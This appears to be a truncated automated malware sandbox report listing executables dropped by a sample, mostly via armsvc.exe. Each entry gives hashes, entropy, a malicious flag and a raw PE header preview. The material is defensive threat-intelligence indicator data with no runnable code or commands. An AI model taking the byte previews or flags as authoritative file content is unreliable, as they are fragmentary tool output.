                                                                                                                                                        SSDEEP:24576:wTfcT++foSBWU2Yxhkgr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:4fcK+foQWU2YnPrLNiXicJFFRGNzj3
                                                                                                                                                        MD5:39E6015DF2669922DD171DC2AB1A9C0E
                                                                                                                                                        SHA1:F104866713E1C5CD1944F0AF83D5ADE4510AF2A7
                                                                                                                                                        SHA-256:82E642CCC194B788F5D137C385E5D05F0C38423B6E6880D29B6507480B7B0BB6
                                                                                                                                                        SHA-512:043AF726D645935D96B39BADD1611710CF152FF3C2AE9BD64F0B365A8E76E90C5815E46ADA07D5E7B7BD6EBFD96A78563A10220AA9C5A1B09308597EB33EB442
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@..........................."..............................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1376768
                                                                                                                                                        Entropy (8bit):4.65688349131681
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:tbBRzBgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xBRVgLLNiXicJFFRGNzj3
                                                                                                                                                        MD5:D41138E7DBED145D9F8CA3F8E72370A8
                                                                                                                                                        SHA1:BE061C1DEE2C376752646915B97AF089F57808CC
                                                                                                                                                        SHA-256:79FFC56004C3D65DEB811AAFB905ABA4E20AAFC42FC635349A59608171547438
                                                                                                                                                        SHA-512:DA69658C6D4CCB98ABE342FAE20D9F01602CA568318904CA0BF33DC52FFCEAA6D805C96E42613799D754B3D7D7BD8F7CCF73EA2EE905BE80B3D3C373F83EFD0C
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@........................... .................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2168832
                                                                                                                                                        Entropy (8bit):7.937635014377381
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:Fy53w24gQu3TPZ2psFkiSqwoz1LNiXicJFFRGNzj3:FyFQgZqsFki+oz17wRGpj3
                                                                                                                                                        MD5:5DD8ED8FB5C1EFAB98C2E3577D6A90A6
                                                                                                                                                        SHA1:08CB941DEFCCADCB8D4DE21427CE4BD3AF05EA1A
                                                                                                                                                        SHA-256:7BB913DB212B5B280E8F41191D7E15FA22C3771AFAADC485549FFC8D6FDD037A
                                                                                                                                                        SHA-512:CC5D418CA8B67A534BB48EAE607D9FE85B9A552DAFF7E5A9952B9819405BEBCB113BE57D2C1150853B4C67CA9D038CD2D159AEADC47F50680625F63DAF3CE259
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.......!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3141
                                                                                                                                                        Entropy (8bit):4.843414277816815
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:s2+T292q272nd242zR62E22N2EmR2+82t2u2V222o2E/2oO25w2Eq2EH2c2G222L:TWxPA30
                                                                                                                                                        MD5:FD0C5EB0770B32DF6C4D7BE94BCE61EC
                                                                                                                                                        SHA1:375C3C79B5C15CC993D555C32A26CA96622F7939
                                                                                                                                                        SHA-256:88319AA2E82230A16EB6FDD1D64C9EF2F93904190609E7061F4B3D57248E1F44
                                                                                                                                                        SHA-512:43B5CA61B7ADF724BC75961C6E7484B83055D05F787C138709CE469972066B5B60DDE316F1DF54BBBDF40218F0872AD25E508106B7DB0E60D38E17AD35238B68
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeAuditPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeBackupPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2025-01-10 15:40:47-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeDebugPrivilege...2025-01-10 15:40:47-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2025-01-10 15:40:4
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1512448
                                                                                                                                                        Entropy (8bit):4.897870636095488
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:fQVTZu0JV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oVTZuILNiXicJFFRGNzj3
                                                                                                                                                        MD5:DE04250FA2299A6D9B6C11E1BF4926F3
                                                                                                                                                        SHA1:3F65E812EF2B14639282951375964C2DD45DE53A
                                                                                                                                                        SHA-256:BB1C442D4D4B05EAA0E2BC5803C4B5312CD5BD32FAA21D3A4168CCC84EAB5653
                                                                                                                                                        SHA-512:87F3A4C8B1A3C8A955BFC6D8CC97F254CE34D3D195797E5D83BF2B091BBFA1E10EBDF228932C47A31E7F82D7AF2E3D176C1056D649357B1D61156C4B5241A4CC
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`"....._;.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1839616
                                                                                                                                                        Entropy (8bit):5.246001366466649
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:/+gkEdfh4Coj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:2gkE5SRLNiXicJFFRGNzj3
                                                                                                                                                        MD5:4A8BCCE2061290633A322F9C5EFBB7FF
                                                                                                                                                        SHA1:84674645DA0B8824A9D13F6983C315B14F59FBC7
                                                                                                                                                        SHA-256:556C408B8469DC0608B759320F61B5857A7933BFC02757F457A07B881B5B4D36
                                                                                                                                                        SHA-512:B0700D2C3A6589B56EB831F6720F2E0523B639FD34FEA37F55FB0D0DF7A374191334903BB4D22AC3C2BA363A11368F56810044B876852E75CF722794DEC9BB4F
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@..............................0'......f.... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...`...........r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1532416
                                                                                                                                                        Entropy (8bit):7.089467422140575
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:CBpDRmi78gkPXlyo0Ghjrs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:2NRmi78gkPX4o0GhjILNiXicJFFRGNzb
                                                                                                                                                        MD5:BE94FA53102078F625A45EBDEB5ED570
                                                                                                                                                        SHA1:661276A33BCF5AEFB3C4544EC7594F49DA07A0A2
                                                                                                                                                        SHA-256:BB8830C1A7BBDB3512642383F5DBEBF0802C7759BA4366FFADFB1BC0A560071E
                                                                                                                                                        SHA-512:4E33660BD14D73B5C087AE8F918C2B23FE6A305D3AF140A787BE97FC24D884FFB3F76E28F62A248C270B7412755AA0FCE6B18D18C0242E2572C33FB3EC0EF599
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................;..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                        Entropy (8bit):7.220009486740175
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:pLOS2oPPIXVj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:z/PgLNiXicJFFRGNzj3
                                                                                                                                                        MD5:81E13C638638BF2653BBA1BD9683B6EB
                                                                                                                                                        SHA1:6B96D7ECF432BDE6CBFE1F976F1C5DAF64A80336
                                                                                                                                                        SHA-256:E1D2C175E3A83937F3B9D95F1C35EB7ADF9C1B6B4692222D7544CE674A9A52A7
                                                                                                                                                        SHA-512:0070578D0193F7468E233A42327B07D6D319CC6DCDF4132B30F47F1C5FAA4AF6DB262AD55D8D2328A6641FBEC21F00FF5C489C405305AE9927D43FD6AACED1BA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................X.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1300992
                                                                                                                                                        Entropy (8bit):4.528906569211355
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:2Yx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ZLNiXicJFFRGNzj3
                                                                                                                                                        MD5:109CC960AFAE06680B7C753FDF5F52B0
                                                                                                                                                        SHA1:BF42BF8BFD64E51D3B9A775DCB14DEC19B31CCF1
                                                                                                                                                        SHA-256:B7776CBBF1F1C13CAF08552AC55C9D82F8E292408D4A853B7A1DF93C2E525B39
                                                                                                                                                        SHA-512:355AE398C72BE0103E9D8E83945EEC656577B8420461BE579470B82C46BDC68410515CBC4B6B3871AE69942B1096364B4D3654FF76216DCCE1569660B4C0E644
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................G.......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....p...`.......*..............@...........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1222656
                                                                                                                                                        Entropy (8bit):6.698814668650946
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:FtdzS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FtduLNiXicJFFRGNzj3
                                                                                                                                                        MD5:71A7A21E4122C6690E24044B48BA649E
                                                                                                                                                        SHA1:C7608A116A33E4518B708ADA54DCB876761C8D4F
                                                                                                                                                        SHA-256:F0068C1BE4A6FF808217A9BDA7F90252423F9ED4E687F9FA8A7A15D733BF6563
                                                                                                                                                        SHA-512:8023002B7361C5ACA67D0E481575A1F54400C47B81B0E08D3F73DEAD7BABF5A206297771C267754444268BCE3B0A5AF0D4D26ABCDE22677ADCF7AB9D67D9340A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.....................................].... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1613312
                                                                                                                                                        Entropy (8bit):4.676562879365968
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:FvciJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:U/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:8735FA35DF8EF4089A8B95E0AC602540
                                                                                                                                                        SHA1:0D9926D4D9AD76F934F1C7BE2D4FAF7E29F194A4
                                                                                                                                                        SHA-256:2FB38BBB2FEB794867EACDB7416CD155BC76C12EE375747E4C43459CB3FB7985
                                                                                                                                                        SHA-512:76E5BDBDD5FC1998B970B8568307C5F735C8AEA895BF8EE89441508465EE081846C0406E82B945B80F966D4DFC2AF1A79FDD21B602BF112E304DC0CF1BA83062
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@..............................#........... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...`...P......................@...................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1616896
                                                                                                                                                        Entropy (8bit):5.043531871009412
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:+5zhM1XSFf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EMsVLNiXicJFFRGNzj3
                                                                                                                                                        MD5:0C4B2CFA8B0ED30D0A94B3132AEAB9F6
                                                                                                                                                        SHA1:1E60A4178D7E928710484C8D1728175AC8058FD6
                                                                                                                                                        SHA-256:021BA387F1B090CEE324684DDD7B9E79FA042A5930D1F6CD44F698B8AC0EC72C
                                                                                                                                                        SHA-512:D18782A1189C703D5C3331F666673156CAC61B6ADDAF115239E5491C081D86FC365338ABF4AFCC724FD2AC8843470802AB034D86354422B0B9CAF796BF230A41
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@..............................#........... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...`...0......................@...........................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                        Entropy (8bit):6.496756385915215
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:KtuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755ULNiXico:KjEIa3HIEWOc5u7wRGpj3
                                                                                                                                                        MD5:67E2C0CC4B12CFBA90AC1FC49F1324CB
                                                                                                                                                        SHA1:94FE884A2134EEFC1AB53E01590478CD44E08572
                                                                                                                                                        SHA-256:7C4972E5CB67B01CB1F01F8E74FB4A2EA74B19596AABAE77501ABA9142E3B976
                                                                                                                                                        SHA-512:E0EDCCAEE8F000769E2FBFB7318D3028E581EA5D78EADD7FF34A9E2B01BECB1B1AD1E586301AE63631660E8E0366795228911CA2FB361EE096B854E2290857FA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                        Entropy (8bit):7.999353905234866
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:1572864:7Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:sXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                        MD5:6AB63261E28F91F333948DC6F69A4B4F
                                                                                                                                                        SHA1:C12CB0325E7F5E7822800020BCED68316C51E169
                                                                                                                                                        SHA-256:E2B18587991E41120D3972D83729B49DA1E2233A554825122A961260362EFA55
                                                                                                                                                        SHA-512:AFA6AA2ED824D569D50B9765C0BA892FD9CB4DB7D076E44929E0C3B6D56D394EB982939E967BA5279BBAC47EA1C628B839799A9298F8E3EAE3D4B4AB5EA3EA46
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......*..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1335808
                                                                                                                                                        Entropy (8bit):4.592584412454563
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:QWpiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Qs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:2FFF248AEC91FA2F42FA0165CE3BBB5D
                                                                                                                                                        SHA1:E8E895EC43A0EB570344C3088AA868011130017F
                                                                                                                                                        SHA-256:D65F6676F899E2D3ABEDBB59DC515E240330EB3EA007B598B53DA7166DA6F265
                                                                                                                                                        SHA-512:BC5C50A39EE2BEB735D80B81AD67DAFE286B4CEAE6E169ED7F4913F6318EEB1E3F74CA95BA0E599AA3FAAF129062AF95E8DC1619662769E78ACDE2F1609305B6
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................P.......p.... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6210048
                                                                                                                                                        Entropy (8bit):6.384606624288671
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:KDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXS:LnN9KfxLk6GEQTXsUKzNDp7wRGpj3
                                                                                                                                                        MD5:16F018C3AFBF7D467B4241F979105BD4
                                                                                                                                                        SHA1:A623A6E778682D70A0801A79A6580300EDA7520B
                                                                                                                                                        SHA-256:B9C91A82F6D6C25FFE0E84CFC238B1F9B95E3C51361BCA31060F39BFDD59E7F1
                                                                                                                                                        SHA-512:C3837C59B271081B8D47935B18BBFA26A0E107BCDE1D508BB11CC8AF5C070ED2151BFDD55F462B1B6D0DB3928DA8B7369E641CE96B24812F1E6BE0DA32AA28DC
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1312768
                                                                                                                                                        Entropy (8bit):4.543815353038613
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:5TiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:5n/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                        MD5:AC52A67A31DE371D83F4F9638C10ED66
                                                                                                                                                        SHA1:F8450CB2EF1E43C6E868BADEB5F8D463AFD523D0
                                                                                                                                                        SHA-256:D0B0602530D486EC72AC2D307A29720D7D87622A7E864F9E5E1E71F5BFE4CC7B
                                                                                                                                                        SHA-512:C168E3FC7CDFD1D564C88297531C6F552A84C90181D816AD787181F0109BA2A0A1B75503C756BE2FAE3AE15B6A9E4079D5BECE33468ED5000584A84319ADCD70
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...`...........h..............@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):12039168
                                                                                                                                                        Entropy (8bit):6.595652799814651
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:9b+MzPstUEHInwZ33RBk9DdhgJCudq1uVIyESYgKE7wRGpj3:BnPgTHIwZnRBk9DdhSUEVIXgKQF9
                                                                                                                                                        MD5:B2FE2F704B5E8CC7478A71BC26709A63
                                                                                                                                                        SHA1:7F0F56500E7AD07D1F7A94170DD670825EF44523
                                                                                                                                                        SHA-256:68A58F561512D7645D671A866E9DA31FFD0799DF93E12A61E5CF31088AF5C593
                                                                                                                                                        SHA-512:C6FBB094089F11947BB1CBEC0EDB457DDFAB91D02260A257337AA3F3AB8350A96A9169A3CDF418328453CBC41E584DDB067E7422C6CA0A15B013CF424BD9FDEF
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................m.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1478144
                                                                                                                                                        Entropy (8bit):4.82604135434762
                                                                                                                                                        Encrypted:false
